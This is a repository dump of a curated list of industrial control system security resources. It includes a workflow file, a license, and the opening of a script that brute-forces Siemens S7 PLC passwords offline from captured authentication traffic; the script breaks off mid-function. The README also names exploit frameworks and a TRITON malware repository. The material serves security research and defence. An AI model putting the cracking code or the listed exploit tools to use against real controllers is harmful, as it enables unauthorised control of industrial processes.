├── .github
└── workflows
│ └── links.yml
├── CONTRIBUTING.md
├── LICENSE
├── README.md
└── source
├── s7-brute-offline.py
└── s7-cracker.py
/.github/workflows/links.yml:
--------------------------------------------------------------------------------
1 | name: Links
2 |
3 | on:
4 | push:
5 | branches:
6 | - main
7 | pull_request:
8 | branches:
9 | - main
10 | workflow_dispatch:
11 | # repository_dispatch:
12 | # workflow_dispatch:
13 | # schedule:
14 | # - cron: "00 18 * * *"
15 |
16 | jobs:
# NOTE(review): no `permissions:` key is declared at workflow or job level, so
# the GITHUB_TOKEN handed to the lychee step below carries the repository's
# default scope. Least privilege for a link checker is a read-only token.
17 | linkChecker:
18 | runs-on: ubuntu-latest
19 | steps:
# NOTE(review): both third-party actions are referenced by mutable tags
# (`@v2`, `@v1.0.8`). Pinning each to a full commit SHA, and reviewing the
# diff before bumping, removes the tag-retarget supply-chain risk.
20 | - uses: actions/checkout@v2
21 | - name: Link Checker
22 | id: lychee
23 | uses: lycheeverse/lychee-action@v1.0.8
24 | with:
# The checked link set is every URL found in checked-in Markdown/HTML. On
# pull_request runs that set comes from the PR, so the checker's outbound
# requests are contributor-influenced; another reason to keep the token
# read-only.
25 | args: --verbose --no-progress **/*.md **/*.html
26 | env:
# The repository token is exposed to the third-party action here,
# presumably for GitHub API rate limiting — confirm against the action's
# documentation before widening its scope.
27 | GITHUB_TOKEN: ${{secrets.GITHUB_TOKEN}}
# `exit_code` is an output set by the lychee step itself (id: lychee), not
# event data; inlining an expression into `run` is only safe while that
# stays true.
28 | - name: Fail if there were link errors
29 | run: exit ${{ steps.lychee.outputs.exit_code }}
30 |
31 | # - name: Create Issue From File
32 | # uses: peter-evans/create-issue-from-file@v2
33 | # with:
34 | # title: Link Checker Report
35 | # content-filepath: ./lychee/out.md
36 | # labels: report, automated issue
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | # Contribution Guidelines
2 |
3 | Please ensure your pull request adheres to the following guidelines:
4 |
5 | - Make sure your submission is not a duplicate.
6 | - Make an individual pull request for each suggestion.
7 | - Adhere to the table formatting, which makes for easier reading.
8 | - The pull request and commit should have a useful title.
9 |
10 | Thanks for your suggestions!
11 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | Apache License
2 | Version 2.0, January 2004
3 | http://www.apache.org/licenses/
4 |
5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
6 |
7 | 1. Definitions.
8 |
9 | "License" shall mean the terms and conditions for use, reproduction,
10 | and distribution as defined by Sections 1 through 9 of this document.
11 |
12 | "Licensor" shall mean the copyright owner or entity authorized by
13 | the copyright owner that is granting the License.
14 |
15 | "Legal Entity" shall mean the union of the acting entity and all
16 | other entities that control, are controlled by, or are under common
17 | control with that entity. For the purposes of this definition,
18 | "control" means (i) the power, direct or indirect, to cause the
19 | direction or management of such entity, whether by contract or
20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the
21 | outstanding shares, or (iii) beneficial ownership of such entity.
22 |
23 | "You" (or "Your") shall mean an individual or Legal Entity
24 | exercising permissions granted by this License.
25 |
26 | "Source" form shall mean the preferred form for making modifications,
27 | including but not limited to software source code, documentation
28 | source, and configuration files.
29 |
30 | "Object" form shall mean any form resulting from mechanical
31 | transformation or translation of a Source form, including but
32 | not limited to compiled object code, generated documentation,
33 | and conversions to other media types.
34 |
35 | "Work" shall mean the work of authorship, whether in Source or
36 | Object form, made available under the License, as indicated by a
37 | copyright notice that is included in or attached to the work
38 | (an example is provided in the Appendix below).
39 |
40 | "Derivative Works" shall mean any work, whether in Source or Object
41 | form, that is based on (or derived from) the Work and for which the
42 | editorial revisions, annotations, elaborations, or other modifications
43 | represent, as a whole, an original work of authorship. For the purposes
44 | of this License, Derivative Works shall not include works that remain
45 | separable from, or merely link (or bind by name) to the interfaces of,
46 | the Work and Derivative Works thereof.
47 |
48 | "Contribution" shall mean any work of authorship, including
49 | the original version of the Work and any modifications or additions
50 | to that Work or Derivative Works thereof, that is intentionally
51 | submitted to Licensor for inclusion in the Work by the copyright owner
52 | or by an individual or Legal Entity authorized to submit on behalf of
53 | the copyright owner. For the purposes of this definition, "submitted"
54 | means any form of electronic, verbal, or written communication sent
55 | to the Licensor or its representatives, including but not limited to
56 | communication on electronic mailing lists, source code control systems,
57 | and issue tracking systems that are managed by, or on behalf of, the
58 | Licensor for the purpose of discussing and improving the Work, but
59 | excluding communication that is conspicuously marked or otherwise
60 | designated in writing by the copyright owner as "Not a Contribution."
61 |
62 | "Contributor" shall mean Licensor and any individual or Legal Entity
63 | on behalf of whom a Contribution has been received by Licensor and
64 | subsequently incorporated within the Work.
65 |
66 | 2. Grant of Copyright License. Subject to the terms and conditions of
67 | this License, each Contributor hereby grants to You a perpetual,
68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
69 | copyright license to reproduce, prepare Derivative Works of,
70 | publicly display, publicly perform, sublicense, and distribute the
71 | Work and such Derivative Works in Source or Object form.
72 |
73 | 3. Grant of Patent License. Subject to the terms and conditions of
74 | this License, each Contributor hereby grants to You a perpetual,
75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable
76 | (except as stated in this section) patent license to make, have made,
77 | use, offer to sell, sell, import, and otherwise transfer the Work,
78 | where such license applies only to those patent claims licensable
79 | by such Contributor that are necessarily infringed by their
80 | Contribution(s) alone or by combination of their Contribution(s)
81 | with the Work to which such Contribution(s) was submitted. If You
82 | institute patent litigation against any entity (including a
83 | cross-claim or counterclaim in a lawsuit) alleging that the Work
84 | or a Contribution incorporated within the Work constitutes direct
85 | or contributory patent infringement, then any patent licenses
86 | granted to You under this License for that Work shall terminate
87 | as of the date such litigation is filed.
88 |
89 | 4. Redistribution. You may reproduce and distribute copies of the
90 | Work or Derivative Works thereof in any medium, with or without
91 | modifications, and in Source or Object form, provided that You
92 | meet the following conditions:
93 |
94 | (a) You must give any other recipients of the Work or
95 | Derivative Works a copy of this License; and
96 |
97 | (b) You must cause any modified files to carry prominent notices
98 | stating that You changed the files; and
99 |
100 | (c) You must retain, in the Source form of any Derivative Works
101 | that You distribute, all copyright, patent, trademark, and
102 | attribution notices from the Source form of the Work,
103 | excluding those notices that do not pertain to any part of
104 | the Derivative Works; and
105 |
106 | (d) If the Work includes a "NOTICE" text file as part of its
107 | distribution, then any Derivative Works that You distribute must
108 | include a readable copy of the attribution notices contained
109 | within such NOTICE file, excluding those notices that do not
110 | pertain to any part of the Derivative Works, in at least one
111 | of the following places: within a NOTICE text file distributed
112 | as part of the Derivative Works; within the Source form or
113 | documentation, if provided along with the Derivative Works; or,
114 | within a display generated by the Derivative Works, if and
115 | wherever such third-party notices normally appear. The contents
116 | of the NOTICE file are for informational purposes only and
117 | do not modify the License. You may add Your own attribution
118 | notices within Derivative Works that You distribute, alongside
119 | or as an addendum to the NOTICE text from the Work, provided
120 | that such additional attribution notices cannot be construed
121 | as modifying the License.
122 |
123 | You may add Your own copyright statement to Your modifications and
124 | may provide additional or different license terms and conditions
125 | for use, reproduction, or distribution of Your modifications, or
126 | for any such Derivative Works as a whole, provided Your use,
127 | reproduction, and distribution of the Work otherwise complies with
128 | the conditions stated in this License.
129 |
130 | 5. Submission of Contributions. Unless You explicitly state otherwise,
131 | any Contribution intentionally submitted for inclusion in the Work
132 | by You to the Licensor shall be under the terms and conditions of
133 | this License, without any additional terms or conditions.
134 | Notwithstanding the above, nothing herein shall supersede or modify
135 | the terms of any separate license agreement you may have executed
136 | with Licensor regarding such Contributions.
137 |
138 | 6. Trademarks. This License does not grant permission to use the trade
139 | names, trademarks, service marks, or product names of the Licensor,
140 | except as required for reasonable and customary use in describing the
141 | origin of the Work and reproducing the content of the NOTICE file.
142 |
143 | 7. Disclaimer of Warranty. Unless required by applicable law or
144 | agreed to in writing, Licensor provides the Work (and each
145 | Contributor provides its Contributions) on an "AS IS" BASIS,
146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 | implied, including, without limitation, any warranties or conditions
148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 | PARTICULAR PURPOSE. You are solely responsible for determining the
150 | appropriateness of using or redistributing the Work and assume any
151 | risks associated with Your exercise of permissions under this License.
152 |
153 | 8. Limitation of Liability. In no event and under no legal theory,
154 | whether in tort (including negligence), contract, or otherwise,
155 | unless required by applicable law (such as deliberate and grossly
156 | negligent acts) or agreed to in writing, shall any Contributor be
157 | liable to You for damages, including any direct, indirect, special,
158 | incidental, or consequential damages of any character arising as a
159 | result of this License or out of the use or inability to use the
160 | Work (including but not limited to damages for loss of goodwill,
161 | work stoppage, computer failure or malfunction, or any and all
162 | other commercial damages or losses), even if such Contributor
163 | has been advised of the possibility of such damages.
164 |
165 | 9. Accepting Warranty or Additional Liability. While redistributing
166 | the Work or Derivative Works thereof, You may choose to offer,
167 | and charge a fee for, acceptance of support, warranty, indemnity,
168 | or other liability obligations and/or rights consistent with this
169 | License. However, in accepting such obligations, You may act only
170 | on Your own behalf and on Your sole responsibility, not on behalf
171 | of any other Contributor, and only if You agree to indemnify,
172 | defend, and hold each Contributor harmless for any liability
173 | incurred by, or claims asserted against, such Contributor by reason
174 | of your accepting any such warranty or additional liability.
175 |
176 | END OF TERMS AND CONDITIONS
177 |
178 | APPENDIX: How to apply the Apache License to your work.
179 |
180 | To apply the Apache License to your work, attach the following
181 | boilerplate notice, with the fields enclosed by brackets "{}"
182 | replaced with your own identifying information. (Don't include
183 | the brackets!) The text should be enclosed in the appropriate
184 | comment syntax for the file format. We also recommend that a
185 | file or class name and description of purpose be included on the
186 | same "printed page" as the copyright notice for easier
187 | identification within third-party archives.
188 |
189 | Copyright {yyyy} {name of copyright owner}
190 |
191 | Licensed under the Apache License, Version 2.0 (the "License");
192 | you may not use this file except in compliance with the License.
193 | You may obtain a copy of the License at
194 |
195 | http://www.apache.org/licenses/LICENSE-2.0
196 |
197 | Unless required by applicable law or agreed to in writing, software
198 | distributed under the License is distributed on an "AS IS" BASIS,
199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 | See the License for the specific language governing permissions and
201 | limitations under the License.
202 |
203 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # awesome-industrial-control-system-security
2 | A curated list of resources related to Industrial Control System (ICS) security.
3 |
4 | Feel free to [contribute](CONTRIBUTING.md).
5 |
6 |
7 | ## Tools
8 |
9 |
10 |
11 |
12 | CSET
13 | |
14 |
15 | The Cyber Security Evaluation Tool (CSET®) assists organizations in protecting their key national cyber assets.
16 | This tool provides users with a systematic and repeatable approach for assessing the security posture of their cyber systems and networks.
17 | It includes both high-level and detailed questions related to all industrial control and IT systems.
18 | |
19 |
20 |
21 |
22 | Digital Bond's 3S CoDeSys Tools
23 | |
24 |
25 | Digital Bond created three tools for interacting with PLCs that run CoDeSys, consisting of a command shell, file transfer and NMap script.
26 | |
27 |
28 |
29 |
30 | Digital Bond's ICS Enumeration Tools
31 | |
32 |
33 | Redpoint is a Digital Bond research project to enumerate ICS applications and devices using nmap extensions.
34 | It can be used during assessments to discover ICS devices and pull information that would be helpful in secondary testing.
35 | The Redpoint tools use legitimate protocol or application commands to discover and enumerate devices and applications.
36 | There is no effort to exploit or crash anything, but be wise and careful.
37 | |
38 |
39 |
40 |
41 | GRASSMARLIN
42 | |
43 |
44 | GRASSMARLIN provides IP network situational awareness of industrial control systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks to support network security. Passively map, and visually display, an ICS/SCADA network topology while safely conducting device discovery, accounting, and reporting on these critical cyber-physical systems.
45 | |
46 |
47 |
48 |
49 | ics_mem_collect
50 | |
51 |
52 | Memory collector for GE D20MX. The project itself can be extended to work with other devices.
53 | |
54 |
55 |
56 |
57 | ISF
58 | |
59 |
60 | The Industrial Exploitation Framework (ISF) is an exploitation framework similar to Metasploit written in Python. It is based on the open source Routersploit tool. It contains exploits for several types of controllers, such as QNX, Siemens and Schneider devices and includes several scanners.
61 | |
62 |
63 |
64 |
65 | ISEF
66 | |
67 |
68 | The Industrial Security Exploitation Framework (ISEF) is an exploitation framework based on the Equation Group Fuzzbunch toolkit as released by Shadow Brokers. It's developed by the ICSMASTER Security Team.
69 | |
70 |
71 |
72 |
73 | ꓘamerka GUI
74 | |
75 |
76 | Ultimate Internet of Things/Industrial Control Systems reconnaissance tool.
77 | |
78 |
79 |
80 |
81 | mbtget
82 | |
83 |
84 | mbtget - Simple Perl script to make Modbus transactions from the command line.
85 | |
86 |
87 |
88 |
89 | MiniCPS
90 | |
91 |
92 | MiniCPS: A toolkit for security research on Cyber-Physical
93 | Systems from Singapore University of Technology and Design (SUTD).
94 | |
95 |
96 |
97 |
98 | MODBUS Penetration Testing Framework
99 | |
100 |
101 | smod is a modular framework with every kind of diagnostic and offensive feature you could need in order to pentest the Modbus protocol. It is a full Modbus protocol implementation using Python and Scapy. The framework can be used to perform vulnerability assessments.
102 | |
103 |
104 |
105 |
106 | ModbusPal
107 | |
108 |
109 | ModbusPal is a MODBUS slave simulator. Its purpose is to offer an easy-to-use interface with the capability to reproduce complex and realistic MODBUS environments.
110 | |
111 |
112 |
113 |
114 | ModScan
115 | |
116 |
117 | ModScan is a new tool designed to map a SCADA MODBUS TCP based network.
118 | |
119 |
120 |
121 |
122 | NetToPLCSim
123 | |
124 |
125 | TCP/IP-Network extension for the PLC simulation software Siemens PLCSim.
126 | |
127 |
128 |
129 |
130 | OpenDNP3
131 | |
132 |
133 | OpenDNP3 is the de facto reference implementation of IEEE-1815 (DNP3) provided under the Apache License.
134 | It is currently in maintenance-only mode and new features are no longer being added.
135 | Automatak has rebranded as Step Function I/O and is now focused on writing protocol libraries in Rust.
136 | |
137 |
138 |
139 |
140 | PLCinject
141 | |
142 |
143 | PLCinject can be used to inject code into PLCs.
144 | |
145 |
146 |
147 |
148 | plcscan
149 | |
150 |
151 | Tool for scanning PLC devices over the S7comm or Modbus protocol.
152 | |
153 |
154 |
155 |
156 | Quickdraw IDS
157 | |
158 |
159 | The Quickdraw IDS project by Digital Bond includes Snort rules for SCADA devices and so-called preprocessors for network traffic.
160 | The preprocessors provide significant additional value because of their ability to reconstruct the protocol and state for use by Snort.
161 | |
162 |
163 |
164 |
165 | S7Comm-Analyzer
166 | |
167 |
168 | A plugin for Bro that parses S7comm protocol data traffic.
169 | |
170 |
171 |
172 |
173 | SCADAShutdownTool
174 | |
175 |
176 | SCADAShutdownTool is an industrial control system automation and testing tool that allows security researchers and experts to test SCADA security systems, enumerate slave controllers, read controllers' register values and rewrite register data.
177 | |
178 |
179 |
180 |
181 | sixnet-tools
182 | |
183 |
184 | Tool for exploiting Sixnet RTUs. This simple command line interface allows using undocumented function codes to gain root access and control the underlying Linux OS on certain Sixnet family industrial control devices.
185 | |
186 |
187 |
188 |
189 | Snap7
190 | |
191 |
192 | Snap7 is an open source, 32/64 bit, multi-platform Ethernet communication suite for interfacing natively with Siemens S7 PLCs. The new CPUs 1200/1500, the old S7200, the small LOGO 0BA7/0BA8 and SINAMICS Drives are also partially supported.
193 | |
194 |
195 |
196 |
197 | s7scan
198 | |
199 |
200 | A tool written in Python that scans networks, enumerates Siemens PLCs and gathers basic information about them, such as PLC firmware and hardware version, network configuration and security parameters.
201 | |
202 |
203 |
204 |
205 | S7 Password Bruteforcer
206 | |
207 |
208 | A tool to bruteforce the password used by S7 instances from a PCAP using a dictionary. Originally created by SCADAStrangelove.
209 | |
210 |
211 |
212 |
213 | splonebox
214 | |
215 |
216 | splonebox is an open source network assessment tool with focus on modularity. It offers an ongoing analysis of a network and its devices. One major design decision features development of custom plugins, including ones for industrial communication protocols.
217 | |
218 |
219 |
220 |
221 | Wireshark
222 | |
223 |
224 | Wireshark is the world's foremost network protocol analyzer. It lets you see what's happening on your network at a microscopic level. It is the de facto (and often de jure) standard across many industries and educational institutions. It has support for many protocols used in ICS.
225 | |
226 |
227 |
228 |
229 | PCS7-Hardening-Tool
230 | |
231 |
232 | A standalone PowerShell script that enumerates security issues on Siemens PCS 7 DCS servers, based on Siemens security guides. Created by OTORIO.
233 | |
234 |
235 |
236 |
237 | ## Distributions
238 |
239 |
240 |
241 |
242 | Moki Linux
243 | |
244 |
245 | Moki is a modification of Kali to incorporate various ICS/SCADA tools scattered around the internet, to create a customized Kali Linux geared towards ICS/SCADA pentesting professionals.
246 | |
247 |
248 |
249 |
250 | ControlThings Platform(Previously SamuraiSTFU)
251 | |
252 |
253 | The ControlThings Platform is an open source linux distribution for ICS cyber security teams. It takes the best-in-breed security assessment tools for traditional IT infrastructures and adds specialized tools for embedded electronics, proprietary wireless, and a healthy dose of ICS specific assessment tools, both from the community and custom tools created by the ControlThings I/O teams.
254 | |
255 |
256 |
257 |
258 | ## Honeypots
259 |
260 |
261 |
262 |
263 | Conpot
264 | |
265 |
266 | Conpot is a low interactive server side Industrial Control Systems honeypot designed to be easy to deploy, modify and extend.
267 | It features easy customization and behaviour mimicking, amongst others, and can be extended with real HMIs.
268 | Built and maintained under the Honeynet project.
269 | |
270 |
271 |
272 |
273 | GasPot
274 | |
275 |
276 | GasPot is a honeypot that has been designed to simulate a Veeder Root Guardian AST. These tank gauges are common in the oil and gas industry for gas station tanks to help with inventory of fuels. GasPot was designed to randomize as much as possible so no two instances look exactly the same.
277 | |
278 |
279 |
280 |
281 | T-Pot
282 | |
283 |
284 | T-Pot is a combination of several honeypots that run in docker containers. Suricata and the ELK stack are used for security monitoring and visualization.
285 | Amongst others, it features Conpot and eMobility, which are ICS and next-generation transport infrastructure honeypots respectively.
286 | |
287 |
288 |
289 |
290 | ## Data
291 |
292 |
293 |
294 |
295 | 4SICS ICS Lab PCAPS
296 | |
297 |
298 | The "Geek Lounge" at 4SICS contains an ICS lab with PLCs, RTUs, servers, industrial network equipment (switches, firewalls, etc.). These devices are available for hands-on "testing" by 4SICS attendees, and traffic has been captured from them.
299 | |
300 |
301 |
302 |
303 | DEF CON 23 ICS Village PCAPS
304 | |
305 |
306 | PCAPS from the 23rd DEF CON.
307 | |
308 |
309 |
310 |
311 | ICS Map
312 | |
313 |
314 | A map created from data gathered by Shodan showing ICS devices. Data is made available for further analysis.
315 | |
316 |
317 |
318 |
319 | ICS PCAP Collection by Jason Smith
320 | |
321 |
322 | A collection of PCAPs for various ICS utilities and protocols.
323 | |
324 |
325 |
326 |
327 | ICS Radar
328 | |
329 |
330 | Data gathered from several types of ICS protocols by Shodan visualized on a globe.
331 | |
332 |
333 |
334 |
335 | S4x15 ICS Village
336 | |
337 |
338 | Mirror for the PCAPS from the S4x15 CTF as used during the contest.
339 | |
340 |
341 |
342 |
343 | S7 PCAP samples
344 | |
345 |
346 | Sample files for Wireshark S7 protocol dissector plugin.
347 | |
348 |
349 |
350 |
351 | SCADAPASS
352 | |
353 |
354 | The famous SCADA StrangeLove Default/Hardcoded Passwords List.
355 | |
356 |
357 |
358 |
359 | TRISIS/TRITON/HATMAN malware repository
360 | |
361 |
362 | Repository containing original and decompiled files of TRISIS/TRITON/HATMAN malware targeting Triconex Safety Instrumented System (SIS) controllers.
363 | |
364 |
365 |
366 |
367 |
368 | ## Frameworks
369 |
370 |
371 |
372 |
373 | I-ISMS
374 | |
375 |
376 | The Industrial Information Security Management System (I-ISMS) can be used to rapidly deploy an information security management program in an industrial setting. It provides templates for creating and implementing a program starting from the basics.
377 | |
378 |
379 |
380 |
381 | ## Feeds and News
382 |
383 |
384 |
385 |
386 | ICS-CERT Alerts
387 | |
388 |
389 | The ICS-CERT Alert feed is intended to provide timely notification to critical infrastructure owners and operators concerning threats or activity with the potential to impact critical infrastructure computing networks.
390 | |
391 |
392 |
393 |
394 | ICS-CERT RSS Feed
395 | |
396 |
397 | The RSS feed by the United States ICS-CERT lists news and newly released vulnerability advisories.
398 | |
399 |
400 |
401 |
402 | Industrial Security Alerts
403 | |
404 |
405 | Siemens provides alerts for its industrial systems via this page and RSS feed.
406 | |
407 |
408 |
409 |
410 | North American Electric Reliability Corporation (NERC) Alerts
411 | |
412 |
413 | NERC provides alerts for Bulk Electric System (BES) security advisories and industry recommendations.
414 | |
415 |
416 |
417 |
418 | ABB Cybersecurity Alerts and Notifications
419 | |
420 |
421 | ABB provides alerts for its cyber security incidents and software vulnerabilities.
422 | |
423 |
424 |
425 |
426 | Schneider Electric Cybersecurity Alerts and Notifications
427 | |
428 |
429 | Get the latest updates and alerts on Cyber Security and Compliance from Schneider Electric Software.
430 | |
431 |
432 |
433 |
434 |
435 |
436 | ## Conferences and Conference Material
437 |
438 |
439 |
440 |
441 | CS3STHLM
442 | |
443 |
444 | The Stockholm international summit on Cyber Security in SCADA and Industrial Control Systems is an annual summit that gathers the most important stakeholders across critical processes and industries. CS3STHLM has been organized since 2014, and has quickly become the premier ICS Security Summit in Northern Europe.
445 | |
446 |
447 |
448 |
449 | CS4CA
450 | |
451 |
452 | Cyber Security for Critical Assets is a global series of summits focusing on cyber security for critical infrastructure.
453 | |
454 |
455 |
456 |
457 | SANS ICS Summit Archives
458 | |
459 |
460 | Central repository for the presentation material for the SANS ICS Summits held worldwide (interleaved with other summits).
461 | |
462 |
463 |
464 |
465 | SANS ICS Cybersecurity Conference (WeissCon)
466 | |
467 |
468 | Affectionately known as WeissCon after its founder Joe Weiss, the conference is now owned and operated by SecurityWeek and usually runs in October at different locations each year in the US.
469 | |
470 |
471 |
472 |
473 | Kaspersky Industrial Cybersecurity conference (KICS con)
474 | |
475 |
476 | An annual international industrial cybersecurity conference run by Kaspersky.
477 | |
478 |
479 |
480 |
481 | ## Literature
482 |
483 |
484 |
485 |
486 | ATT&CK® for Industrial Control Systems by MITRE
487 | |
488 |
489 | ATT&CK for ICS is a knowledge base useful for describing the actions an adversary may take while operating within an ICS network.
490 | |
491 |
492 |
493 |
494 | Library of Resources for
495 | Industrial Control System Cyber Security
496 | |
497 |
498 | SCADAhacker.com's ultimate list of ICS/SCADA cybersecurity resources.
499 | |
500 |
501 |
502 |
503 | Applied Cyber Security and the Smart Grid
504 | |
505 |
506 | Applied Cyber Security and the Smart Grid: Implementing Security Controls into the Modern Power Infrastructure by Eric D. Knapp and Raj Samani.
507 | |
508 |
509 |
510 |
511 | A Collection of Resources for Getting Started in ICS/SCADA Cybersecurity
512 | |
513 |
514 | Robert M. Lee's thoughts on some good resources on ICS & SCADA security.
515 | |
516 |
517 |
518 |
519 | Hacker Machine Interface - The State of SCADA HMI Vulnerabilities
520 | |
521 |
522 | A TrendLabs Research Paper from the Trend Micro Zero Day Initiative Team about the current state of SCADA and HMI security.
523 | |
524 |
525 |
526 |
527 | Handbook of SCADA/Control Systems Security
528 | |
529 |
530 | This comprehensive handbook covers fundamental security concepts, methodologies, and relevant information pertaining to supervisory control and data acquisition (SCADA) and other industrial control systems used in utility and industrial facilities worldwide.
531 | |
532 |
533 |
534 |
535 | SCADA Cybersecurity Framework
536 | |
537 |
538 | Paper describing what a SCADA Cyber Security framework should consist of.
539 | |
540 |
541 |
542 |
543 | Industrial Network Security, Second Edition
544 | |
545 |
546 | Industrial Network Security, Second Edition: Securing Critical Infrastructure Networks for Smart Grid, SCADA, and Other Industrial Control Systems by Eric D. Knapp and Joel Thomas Langill.
547 | |
548 |
549 |
550 |
551 | Power System SCADA and Smart Grids
552 | |
553 |
554 | The book brings together in one concise volume the fundamentals and possible application functions of power system supervisory control and data acquisition (SCADA). Not security-oriented and geared towards power systems, but a good primer into SCADA nonetheless.
555 | |
556 |
557 |
558 |
559 | NIST SP 800-82, Revision 2
560 | |
561 |
562 | Guide to Industrial Control Systems (ICS) Security by NIST.
563 | |
564 |
565 |
566 |
567 | The Industrial Control System Cyber Kill Chain
568 | |
569 |
570 | This SANS paper describes the ICS Cyber Kill Chain. It tailors the Lockheed Martin Kill Chain to typical, two phase attacks on ICS systems.
571 | |
572 |
573 |
574 |
575 | An Abbreviated History of Automation, Industrial Control Systems, and Cybersecurity
576 | |
577 |
578 | This SANS paper looks at the background on ICS cybersecurity. Well worth the read to make sure you understand many of the events that have occurred over the past twenty years and how they’ve inspired security in ICS today.
579 | |
580 |
581 |
582 |
583 | Control Engineering - Networking and Security - CyberSecurity
584 | |
585 |
586 | Control Engineering magazine's cybersecurity news and literature.
587 | |
588 |
589 |
590 |
591 | Operational Technology Cyber Security Incidents Ontology (OT-CSIO)
592 | |
593 |
594 | OT-CSIO, created by FireEye, is an ontology to understand, cross-compare and assess cyber security incidents related to operational technology. It provides guidance for assessing risks and helps making informed decisions.
595 | |
596 |
597 |
598 |
599 | CIS Controls Implementation Guide for Industrial Control Systems - Version 7
600 | |
601 |
602 | This document provides guidance on how to apply the security best practices found in CIS Controls Version 7.1 to ICS environments.
603 | |
604 |
605 |
606 |
607 | CIS Controls Internet of Things Companion Guide - Version 7.1
608 | |
609 |
610 | The objective of this document is to have broad applicability across sectors. IoT affects all areas of computing across multiple sectors, such as healthcare, aviation, public safety, and energy. This has led to sector-specific IoT security guidance, but this document is purposefully sector-agnostic.
611 | |
612 |
613 |
614 |
615 |
616 | ## Education
617 |
618 |
619 |
620 |
621 | GRFICSv2
622 | |
623 |
624 | The second version of the Graphical Realism Framework for Industrial Control Simulations (GRFICS) is a framework for realistic industrial control simulations that uses Unity 3D game engine for simulating industrial control systems. GRFICS provides users with a full virtual industrial control system (ICS) network to practice common attacks including command injection, man-in-the-middle, and buffer overflows, and visually see the impact of their attacks in the 3D visualization. Users can also practice their defensive skills by properly segmenting the network with strong firewall rules, or writing intrusion detection rules. The first version can be found here.
625 | |
626 |
627 |
628 |
629 | LICSTER
630 | |
631 |
632 | LICSTER, the Low-cost ICS Security Testbed for Education and Research, aims to help set up a minimal, low-cost Industrial Control System (ICS) testbed for students, researchers, or anyone with an interest in industrial security. The project contains a list of affordable hardware to build the minimalistic ICS with, instructions, configurations and installation scripts to instantiate the system as well as various attacker scenarios and their implications. The paper can be found here.
633 | |
634 |
635 |
636 |
637 | ## Introduction to ICS, SCADA, & PLCs
638 |
639 |
640 |
641 |
642 | PLC Training Org
643 | |
644 |
645 | Site organizes all essential topics related to PLC training up to SCADA systems. While security is interwoven within the 10 learning phases, this is a great security article on the site for those just starting out.
646 | |
647 |
648 |
649 |
650 | Control System Basics
651 | |
652 |
653 | YouTube video explaining control system basics including the type of logic these systems use to sense and create physical changes to take action upon.
654 | |
655 |
656 |
657 |
658 | SCADA Systems - Utility 101 Session with Rusty Williams
659 | |
660 |
661 | Utility industry professional Rusty Williams explains SCADA from an electric utility perspective.
662 | |
663 |
664 |
665 |
666 | Control System Lectures
667 | |
668 |
669 | Brian Douglas YouTube video series where he covers a wide range of topics on control systems in a very easy to process way.
670 | |
671 |
672 |
673 |
674 | The PLC Professor
675 | |
676 |
677 | The PLC Professor and his website plcprofessor.com contain a lot of great resources for learning what programmable logic controllers (PLCs) and other types of control systems and their logic are and how they work.
678 | |
679 |
680 |
681 |
682 | Serial Communications RS232 and RS485
683 | |
684 |
685 | John Rinaldi of Real Time Automation describes Serial communications RS232 and RS485.
686 | |
687 |
688 |
689 |
690 | All You Need To Know About MODBUS-RTU
691 | |
692 |
693 | John Rinaldi of Real Time Automation describes MODBUS-RTU.
694 | |
695 |
696 |
697 |
698 | MODBUS Data Structures
699 | |
700 |
701 | John Rinaldi of Real Time Automation describes MODBUS data structures.
702 | |
703 |
704 |
705 |
706 | All You Need to Know About MODBUS-TCP
707 | |
708 |
709 | John Rinaldi of Real Time Automation describes MODBUS-TCP.
710 | |
711 |
712 |
713 |
714 | How Ethernet TCP/IP is Used by Industrial Protocols
715 | |
716 |
717 | John Rinaldi of Real Time Automation describes Ethernet TCP/IP.
718 | |
719 |
720 |
721 |
722 | RealPars
723 | |
724 |
725 | The RealPars YouTube channel has many videos on industrial automation and PLC programming.
726 | |
727 |
728 |
729 |
730 | ## License
731 |
732 | Licensed under [Apache License 2.0](LICENSE).
733 |
--------------------------------------------------------------------------------
/source/s7-brute-offline.py:
--------------------------------------------------------------------------------
1 | """
2 | As posted on: http://pastebin.com/0G9Q2k6y
3 |
4 | File: s7-brute-offline.py
5 | Desc: offline password brute-forcing based on challenge-response data, extracted from an auth traffic dump file
6 |
7 | Alexander Timorin, Dmitry Sklyarov
8 | http://scadastrangelove.org
9 |
10 | Version: 0.1 (just for demo, don't kick my ass plz)
11 | """
12 |
13 | import sys
14 | import hashlib
15 | import hmac
16 | from binascii import hexlify
17 | try:
18 | from scapy.all import *
19 | except ImportError:
20 | print "please install scapy: http://www.secdev.org/projects/scapy/ "
21 | sys.exit()
22 |
23 |
# Capture to analyse and the wordlist to try.  Both are hard-coded here;
# the sibling script s7-cracker.py takes the same two values from argparse.
cfg_pcap_file = '/root/siemens/RE_S7/stop_cpu_cmd_right_pass_123.pcap'
cfg_dictionary_file = 'dict.txt'
26 |
def get_challenge_response():
    """Locate the S7 auth challenge/response pair in ``cfg_pcap_file``.

    Reads the whole capture with scapy's ``rdpcap`` and identifies three
    frames by their on-wire length and a 5-byte marker in the raw payload
    (``.load``): the challenge from the PLC, the client's response, and the
    PLC's auth result.  Returns ``(challenge, response)`` as 40-character
    hex strings (20 bytes each).  Calls ``sys.exit()`` when the auth result
    is not the "ok" frame or when either value cannot be carved out.

    Python 2 only: relies on ``map`` returning a list, ``dict.keys()``
    returning a sliceable list, and ``hexlify`` returning ``str`` so the
    literal comparisons below can match.
    """
    r = rdpcap(cfg_pcap_file)

    # Per-packet length as reported by scapy, keyed by packet index.
    lens = map(lambda x: x.len, r)
    pckt_lens = dict([(i, lens[i]) for i in range(0,len(lens))])

    # try to find challenge packet
    # Match on length (``.len`` + 14 -- presumably the link-layer header is
    # not included in ``.len``; TODO confirm) and on payload bytes 7..11
    # read as hex.  NOTE(review): iteration follows the Py2 dict order, not
